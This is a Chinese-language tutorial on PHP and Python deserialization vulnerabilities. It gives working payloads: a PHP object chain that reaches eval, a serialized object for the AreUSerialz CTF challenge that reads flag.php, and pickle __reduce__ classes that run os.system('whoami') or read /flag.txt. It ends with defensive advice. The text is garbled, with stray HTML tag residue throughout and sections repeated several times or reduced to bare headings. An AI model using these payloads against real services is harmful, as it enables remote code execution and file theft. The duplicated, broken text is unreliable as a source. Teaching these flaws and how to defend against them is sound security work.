PHP和Python反序列化漏洞分析<\/h1>

序列化与反序列化基础<\/h2>
序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。反序列化则是将这些格式化字符串转为对象形式的过程。<\/p>

PHP序列化格式<\/h3>

O<\/span>:<\/span>7<\/span>:<\/span>"Student"<\/span>:<\/span>1<\/span>:<\/span>{s<\/span>:<\/span>4<\/span>:<\/span>"name"<\/span>;s<\/span>:<\/span>4<\/span>:<\/span>"zjun"<\/span>;}
<\/span><\/span><\/code><\/pre>
O<\/code>表示对象<\/li>
7<\/code>是对象名称长度<\/li>
Student<\/code>是类名<\/li>
1<\/code>表示有1个成员变量<\/li>
s:4:"name"<\/code>表示字符串类型，长度4，变量名"name"<\/li>
s:4:"zjun"<\/code>表示字符串类型，长度4，值"zjun"<\/li>
<\/ul>
PHP不同可见性属性的序列化<\/h3>

public<\/strong>: 直接显示变量名 s:4:"name";s:4:"zjun";<\/code><\/li>
protected<\/strong>: 添加\x00*\x00<\/code>前缀 s:6:"\x00*\x00age";s:2:"19";<\/code><\/li>
private<\/strong>: 添加\x00类名\x00<\/code>前缀 s:15:"\x00Student\x00weight";s:2:"53";<\/code><\/li>
<\/ul>
PHP反序列化漏洞<\/h2>
关键魔术方法<\/h3>



魔术方法<\/th>
触发时机<\/th>
<\/tr>
<\/thead>


__sleep()<\/code><\/td>
在对象被序列化时调用<\/td>
<\/tr>

__wakeup()<\/code><\/td>
在对象被反序列化时调用<\/td>
<\/tr>

__construct()<\/code><\/td>
创建新对象时调用<\/td>
<\/tr>

__destruct()<\/code><\/td>
对象被销毁时调用<\/td>
<\/tr>

__toString()<\/code><\/td>
对象被当作字符串使用时调用<\/td>
<\/tr>
<\/tbody>
<\/table>
漏洞利用示例<\/h3>
class<\/span> Student<\/span>{
<\/span><\/span>    var<\/span> $a;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        $this-><\/span>a<\/span>-><\/span>action<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> one<\/span> {
<\/span><\/span>    var<\/span> $b;
<\/span><\/span>    function<\/span> action<\/span>() {
<\/span><\/span>        eval<\/span>($this-><\/span>b<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>unserialize<\/span>($_GET['a'<\/span>]);
<\/span><\/span><\/code><\/pre>构造payload:<\/p>
class<\/span> Student<\/span> {
<\/span><\/span>    var<\/span> $a;
<\/span><\/span>    function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>a<\/span> =<\/span> new<\/span> one<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>class<\/span> one<\/span> {
<\/span><\/span>    var<\/span> $b =<\/span> "phpinfo();"<\/span>;
<\/span><\/span>}
<\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> Student<\/span>());
<\/span><\/span>\/\/ 输出: O:7:"Student":1:{s:1:"a";O:3:"one":1:{s:1:"b";s:10:"phpinfo();";}}
<\/span><\/span><\/span><\/code><\/pre>实例分析：网鼎杯2020青龙组AreUSerialz<\/h3>
class<\/span> FileHandler<\/span> {
<\/span><\/span>    protected<\/span> $op;
<\/span><\/span>    protected<\/span> $filename;
<\/span><\/span>    protected<\/span> $content;
<\/span><\/span>    
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        if<\/span>($this-><\/span>op<\/span> ===<\/span> "2"<\/span>)
<\/span><\/span>            $this-><\/span>op<\/span> =<\/span> "1"<\/span>;
<\/span><\/span>        $this-><\/span>process<\/span>();
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    public<\/span> function<\/span> process<\/span>() {
<\/span><\/span>        if<\/span>($this-><\/span>op<\/span> ==<\/span> "1"<\/span>) {
<\/span><\/span>            $this-><\/span>write<\/span>();
<\/span><\/span>        } else<\/span> if<\/span>($this-><\/span>op<\/span> ==<\/span> "2"<\/span>) {
<\/span><\/span>            $res =<\/span> $this-><\/span>read<\/span>();
<\/span><\/span>            $this-><\/span>output<\/span>($res);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    private<\/span> function<\/span> read<\/span>() {
<\/span><\/span>        return<\/span> file_get_contents<\/span>($this-><\/span>filename<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法：<\/p>

PHP7+对属性类型不敏感，可将protected改为public绕过字符检查<\/li>
设置op=2触发文件读取<\/li>
<\/ol>
构造payload:<\/p>
class<\/span> FileHandler<\/span> {
<\/span><\/span>    public<\/span> $op =<\/span> 2<\/span>;
<\/span><\/span>    public<\/span> $filename =<\/span> "flag.php"<\/span>;
<\/span><\/span>    public<\/span> $content;
<\/span><\/span>}
<\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> FileHandler<\/span>());
<\/span><\/span>\/\/ 输出: O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
<\/span><\/span><\/span><\/code><\/pre>Python反序列化漏洞<\/h2>
序列化模块<\/h3>

pickle模块<\/strong> - Python特有格式<\/li>
json模块<\/strong> - 通用格式<\/li>
<\/ol>
pickle漏洞利用<\/h3>
通过重写__reduce__<\/code>方法实现命令执行：<\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>class<\/span> Exploit<\/span>(object):
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>system, ('whoami'<\/span>,))
<\/span><\/span>
<\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Exploit())
<\/span><\/span>pickle.<\/span>loads(payload)  # 执行whoami命令<\/span>
<\/span><\/span><\/code><\/pre>实例分析：CISCN2019华北赛区Day1 Web2 ikun<\/h3>
become =<\/span> request.<\/span>cookies.<\/span>get('become'<\/span>)
<\/span><\/span>user =<\/span> pickle.<\/span>loads(urllib.<\/span>unquote(become))  # 反序列化漏洞<\/span>
<\/span><\/span><\/code><\/pre>构造payload读取文件：<\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> urllib
<\/span><\/span>
<\/span><\/span>class<\/span> payload<\/span>(object):
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>       return<\/span> (eval, ("open('\/flag.txt','r').read()"<\/span>,))
<\/span><\/span>
<\/span><\/span>a =<\/span> pickle.<\/span>dumps(payload())
<\/span><\/span>a =<\/span> urllib.<\/span>quote(a)
<\/span><\/span># 输出: c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27\/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>
PHP防御<\/h3>

避免反序列化用户输入<\/li>
使用json_encode()<\/code>\/json_decode()<\/code>替代<\/li>
实现__wakeup()<\/code>或__destruct()<\/code>时进行安全检查<\/li>
<\/ol>
Python防御<\/h3>

使用json<\/code>模块替代pickle<\/code><\/li>
使用pickle<\/code>时设置pickle.Unpickler<\/code>的find_class<\/code>限制可加载的类<\/li>
不要反序列化不可信数据<\/li>
<\/ol>
总结<\/h2>
反序列化漏洞本质上是由于反序列化过程会执行对象的特定方法，攻击者通过精心构造的序列化数据触发危险操作。理解语言特定的序列化机制和魔术方法是发现和利用这类漏洞的关键。<\/p>

魔术方法<\/th>	触发时机<\/th> <\/tr> <\/thead>
`__sleep()<\/code><\/td>`	在对象被序列化时调用<\/td> <\/tr>
`__wakeup()<\/code><\/td>`	在对象被反序列化时调用<\/td> <\/tr>
`__construct()<\/code><\/td>`	创建新对象时调用<\/td> <\/tr>
`__destruct()<\/code><\/td>`	对象被销毁时调用<\/td> <\/tr>
`__toString()<\/code><\/td>`	对象被当作字符串使用时调用<\/td> <\/tr> <\/tbody> <\/table> 漏洞利用示例<\/h3> class<\/span> Student<\/span>{ <\/span><\/span> var<\/span> $a; <\/span><\/span> function<\/span> __destruct() { <\/span><\/span> $this-><\/span>a<\/span>-><\/span>action<\/span>(); <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>class<\/span> one<\/span> { <\/span><\/span> var<\/span> $b; <\/span><\/span> function<\/span> action<\/span>() { <\/span><\/span> eval<\/span>($this-><\/span>b<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>unserialize<\/span>($_GET['a'<\/span>]); <\/span><\/span><\/code><\/pre>构造payload:<\/p> class<\/span> Student<\/span> { <\/span><\/span> var<\/span> $a; <\/span><\/span> function<\/span> __construct() { <\/span><\/span> $this-><\/span>a<\/span> =<\/span> new<\/span> one<\/span>(); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>class<\/span> one<\/span> { <\/span><\/span> var<\/span> $b =<\/span> "phpinfo();"<\/span>; <\/span><\/span>} <\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> Student<\/span>()); <\/span><\/span>\/\/ 输出: O:7:"Student":1:{s:1:"a";O:3:"one":1:{s:1:"b";s:10:"phpinfo();";}} <\/span><\/span><\/span><\/code><\/pre>实例分析：网鼎杯2020青龙组AreUSerialz<\/h3> class<\/span> FileHandler<\/span> { <\/span><\/span> protected<\/span> $op; <\/span><\/span> protected<\/span> $filename; <\/span><\/span> protected<\/span> $content; <\/span><\/span> <\/span><\/span> function<\/span> __destruct() { <\/span><\/span> if<\/span>($this-><\/span>op<\/span> ===<\/span> "2"<\/span>) <\/span><\/span> $this-><\/span>op<\/span> =<\/span> "1"<\/span>; <\/span><\/span> $this-><\/span>process<\/span>(); <\/span><\/span> } <\/span><\/span> <\/span><\/span> public<\/span> function<\/span> process<\/span>() { <\/span><\/span> if<\/span>($this-><\/span>op<\/span> ==<\/span> "1"<\/span>) { <\/span><\/span> $this-><\/span>write<\/span>(); <\/span><\/span> } else<\/span> if<\/span>($this-><\/span>op<\/span> ==<\/span> "2"<\/span>) { <\/span><\/span> $res =<\/span> $this-><\/span>read<\/span>(); <\/span><\/span> $this-><\/span>output<\/span>($res); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> private<\/span> function<\/span> read<\/span>() { <\/span><\/span> return<\/span> file_get_contents<\/span>($this-><\/span>filename<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>绕过方法：<\/p> PHP7+对属性类型不敏感，可将protected改为public绕过字符检查<\/li> 设置op=2触发文件读取<\/li> <\/ol> 构造payload:<\/p> class<\/span> FileHandler<\/span> { <\/span><\/span> public<\/span> $op =<\/span> 2<\/span>; <\/span><\/span> public<\/span> $filename =<\/span> "flag.php"<\/span>; <\/span><\/span> public<\/span> $content; <\/span><\/span>} <\/span><\/span>echo<\/span> serialize<\/span>(new<\/span> FileHandler<\/span>()); <\/span><\/span>\/\/ 输出: O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;} <\/span><\/span><\/span><\/code><\/pre>Python反序列化漏洞<\/h2> 序列化模块<\/h3> pickle模块<\/strong> - Python特有格式<\/li> json模块<\/strong> - 通用格式<\/li> <\/ol> pickle漏洞利用<\/h3> 通过重写__reduce__<\/code>方法实现命令执行：<\/p> import<\/span> pickle <\/span><\/span>import<\/span> os <\/span><\/span> <\/span><\/span>class<\/span> Exploit<\/span>(object): <\/span><\/span> def<\/span> __reduce__<\/span>(self): <\/span><\/span> return<\/span> (os.<\/span>system, ('whoami'<\/span>,)) <\/span><\/span> <\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Exploit()) <\/span><\/span>pickle.<\/span>loads(payload) # 执行whoami命令<\/span> <\/span><\/span><\/code><\/pre>实例分析：CISCN2019华北赛区Day1 Web2 ikun<\/h3> become =<\/span> request.<\/span>cookies.<\/span>get('become'<\/span>) <\/span><\/span>user =<\/span> pickle.<\/span>loads(urllib.<\/span>unquote(become)) # 反序列化漏洞<\/span> <\/span><\/span><\/code><\/pre>构造payload读取文件：<\/p> import<\/span> pickle <\/span><\/span>import<\/span> urllib <\/span><\/span> <\/span><\/span>class<\/span> payload<\/span>(object): <\/span><\/span> def<\/span> __reduce__<\/span>(self): <\/span><\/span> return<\/span> (eval, ("open('\/flag.txt','r').read()"<\/span>,)) <\/span><\/span> <\/span><\/span>a =<\/span> pickle.<\/span>dumps(payload()) <\/span><\/span>a =<\/span> urllib.<\/span>quote(a) <\/span><\/span># 输出: c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27\/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.<\/span> <\/span><\/span><\/code><\/pre>防御措施<\/h2> PHP防御<\/h3> 避免反序列化用户输入<\/li> 使用json_encode()<\/code>\/json_decode()<\/code>替代<\/li> 实现__wakeup()<\/code>或__destruct()<\/code>时进行安全检查<\/li> <\/ol> Python防御<\/h3> 使用json<\/code>模块替代pickle<\/code><\/li> 使用pickle<\/code>时设置pickle.Unpickler<\/code>的find_class<\/code>限制可加载的类<\/li> 不要反序列化不可信数据<\/li> <\/ol> 总结<\/h2> 反序列化漏洞本质上是由于反序列化过程会执行对象的特定方法，攻击者通过精心构造的序列化数据触发危险操作。理解语言特定的序列化机制和魔术方法是发现和利用这类漏洞的关键。<\/p>

PHP和Python反序列化漏洞分析<\/h1>

序列化与反序列化基础<\/h2> 序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。反序列化则是将这些格式化字符串转为对象形式的过程。<\/p>

PHP反序列化漏洞<\/h2>

Python反序列化漏洞<\/h2>

防御措施<\/h2>

总结<\/h2> 反序列化漏洞本质上是由于反序列化过程会执行对象的特定方法，攻击者通过精心构造的序列化数据触发危险操作。理解语言特定的序列化机制和魔术方法是发现和利用这类漏洞的关键。<\/p>

序列化与反序列化基础<\/h2>
序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。反序列化则是将这些格式化字符串转为对象形式的过程。<\/p>

总结<\/h2>
反序列化漏洞本质上是由于反序列化过程会执行对象的特定方法，攻击者通过精心构造的序列化数据触发危险操作。理解语言特定的序列化机制和魔术方法是发现和利用这类漏洞的关键。<\/p>